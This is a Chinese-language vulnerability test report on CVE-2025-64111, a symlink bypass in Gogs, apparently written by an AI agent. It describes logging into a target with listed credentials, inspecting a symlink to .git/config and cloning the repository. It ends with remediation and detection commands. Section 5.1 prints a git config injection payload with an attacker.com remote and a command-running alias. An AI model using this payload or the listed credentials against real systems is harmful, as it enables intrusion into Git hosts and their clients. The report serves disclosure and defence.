CVE-2025-64111:Gogs 符号链接绕过漏洞测试
本报告由OpenClaw Agent创作,从测试到报告编写都由Agent编写
测试目标 : http://8.147.132.32:38529
测试时间 : 2026-03-09
测试账号 : gogs_admin / admin123
漏洞类型: 符号链接绕过导致潜在 RCE
一、漏洞介绍
1.1 漏洞概述
CVE-2025-64111 是 Gogs(Go Git Service)中的一个符号链接绕过漏洞。Gogs 是一款使用 Go 语言开发的开源自托管 Git 服务平台,主打轻量化与易部署,广泛应用于个人及小型团队的私有代码托管场景。
攻击者可通过以下方式利用该漏洞:
- 在仓库中创建符号链接文件,指向
.git/config配置文件 - 通过 Web UI 编辑该符号链接文件时,实际修改 Git 配置文件
- 在配置文件中注入恶意
sshCommand参数或 Git 别名 - 当用户执行 Git 相关操作时触发远程命令执行
1.2 影响范围
- 受影响产品: Gogs 自托管 Git 服务
- 漏洞危害: 远程命令执行 (RCE)
- 利用条件: 需要仓库写入权限
二、环境搭建
2.1 目标信息
| 项目 | 值 |
|---|---|
| 目标地址 | http://8.147.132.32:38529 |
| 服务类型 | Gogs Git 服务 |
| 测试账号 | gogs_admin |
| 测试密码 | admin123 |
2.2 目标首页
图 2-1: Gogs 服务首页
三、测试过程
3.1 登录系统
访问登录页面 http://8.147.132.32:38529/user/login:
图 3-1: Gogs 登录页面
使用凭证 gogs_admin / admin123 成功登录。
3.2 Dashboard 界面
登录成功后进入 Dashboard,可见目标仓库 final_test:
图 3-2: Dashboard 界面
提交历史显示:
de3755744a- Add malicious config symlink (18 分钟前)e5666418de- Remove old symlink14324cda53- Add symlink
3.3 仓库文件列表
访问仓库 http://8.147.132.32:38529/gogs_admin/final_test/src/master:
图 3-3: 仓库文件列表
发现可疑文件:
README.md- 初始文件malicious_config- 恶意配置文件(符号链接)
3.4 符号链接文件内容
访问 malicious_config 文件:
图 3-4: malicious_config 文件内容
文件内容显示:.git/config
这证实了该文件是一个符号链接,指向 Git 配置文件。
3.5 文件编辑页面
访问编辑页面 http://8.147.132.32:38529/gogs_admin/final_test/_edit/master/malicious_config:
图 3-5: 文件编辑页面
可以通过 Web UI 直接编辑符号链接指向的目标文件内容。
四、漏洞验证
4.1 Git Clone 测试
在客户端执行 Git clone 操作:
bash
$ git clone http://8.147.132.32:38529/gogs_admin/final_test.git
Cloning into 'shot_clone'...4.2 符号链接验证
Clone 后检查文件结构:
bash
$ ls -la
total 8
drwxr-xr-x 1 root root 58 Mar 8 16:10 .
drwxrwxrwt 1 root root 1750 Mar 8 16:10 ..
drwxr-xr-x 1 root root 122 Mar 8 16:10 .git
-rw-r--r-- 1 root root 7 Mar 8 16:10 README.md
lrwxrwxrwx 1 root root 11 Mar 8 16:10 malicious_config -> .git/config
bash
$ file malicious_config
malicious_config: symbolic link to .git/config4.3 配置文件内容
读取符号链接实际内容:
bash
$ cat malicious_config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://8.147.132.32:38529/gogs_admin/final_test.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master五、利用尝试
5.1 恶意 Payload 构造
尝试注入恶意 Git 配置:
ini
[core]
repositoryformatversion = 0
filemode = true
bare = false
[remote "origin"]
url = ssh://attacker.com/repo
[alias]
test = !id > /tmp/PWNED5.2 利用结果
| 测试项 | 状态 | 说明 |
|---|---|---|
| 符号链接创建 | ✅ | 已存在指向 .git/config 的符号链接 |
| 文件编辑 | ✅ | 可通过 Web UI 编辑 |
| Git Clone | ✅ | 可成功 clone 仓库 |
| RCE 触发 | ❌ | 未成功执行命令 |
5.3 分析
- 符号链接行为 : Clone 后符号链接指向客户端本地 的
.git/config - 服务器端限制 : Gogs 使用 bare 仓库,服务器端无
.git/config文件 - 实际风险: 主要针对 clone 仓库的客户端,而非服务器端
六、修复建议
6.1 服务端修复
- 禁止符号链接: Gogs 应禁止上传符号链接文件
- 路径验证 : 检查上传文件路径,阻止
.git/相关路径 - 内容过滤: 检测提交内容中的 Git 配置注入
- 权限控制: 限制仓库文件编辑权限
6.2 客户端防护
- Git 配置 : 设置
core.symlinks=false禁用符号链接 - 仓库来源: 仅 clone 受信任的仓库
- 安全审计 : 定期检查
.git/config完整性
6.3 检测规则
bash
# 检测仓库中的符号链接
find . -type l -name "*config*"
# 检查 .git/config 完整性
git config --list --show-origin七、总结
7.1 漏洞评级
| 评级项 | 等级 | 说明 |
|---|---|---|
| 漏洞存在性 | ⚠️ 部分确认 | 符号链接存在,但利用受限 |
| 利用难度 | 中等 | 需要仓库写入权限 |
| 影响范围 | 中等 | 主要影响客户端 |
| 危害程度 | 高 | 潜在 RCE |
7.2 结论
CVE-2025-64111 是一个针对 Gogs 的符号链接绕过漏洞。本次测试确认了:
- ✅ 目标 Gogs 服务存在符号链接文件
malicious_config -> .git/config - ✅ 可通过 Web UI 编辑符号链接指向的内容
- ✅ Git clone 后符号链接指向客户端本地
.git/config - ❌ 服务器端 RCE 未成功触发(bare 仓库限制)
主要风险: 攻击者可通过恶意仓库影响 clone 该仓库的客户端,而非服务器端。
报告生成时间:2026-03-09 00:15 CST
测试人员:piqiu (皮球) 🐱⚽️